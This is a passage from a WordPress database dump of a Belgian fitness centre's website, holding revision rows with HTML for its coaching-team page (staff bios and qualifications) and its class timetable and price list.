href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:48:41', '2013-07-03 19:48:41', '', 20, 'http://www.crosstrainingcenter.be/?p=249', 0, 'revision', '', 0),
(250, 1, '2013-07-03 19:51:00', '2013-07-03 19:51:00', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports<br>\r\nFormateur coach<br>\r\nCoach</h5>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\n\r\nFormateur coach\r\n\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:51:00', '2013-07-03 19:51:00', '', 20, 'http://www.crosstrainingcenter.be/?p=250', 0, 'revision', '', 0),
(256, 1, '2013-07-03 19:13:39', '2013-07-03 19:13:39', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 19:13:39', '2013-07-03 19:13:39', '', 11, 'http://www.crosstrainingcenter.be/?p=256', 0, 'revision', '', 0),
(251, 1, '2013-07-03 19:52:22', '2013-07-03 19:52:22', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting</h5>\r\nFormateur coach\r\n\r\nCoach\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:52:22', '2013-07-03 19:52:22', '', 20, 'http://www.crosstrainingcenter.be/?p=251', 0, 'revision', '', 0),
(252, 1, '2013-07-03 19:54:26', '2013-07-03 19:54:26', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:54:26', '2013-07-03 19:54:26', '', 20, 'http://www.crosstrainingcenter.be/?p=252', 0, 'revision', '', 0),
(253, 1, '2013-07-03 19:55:18', '2013-07-03 19:55:18', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a 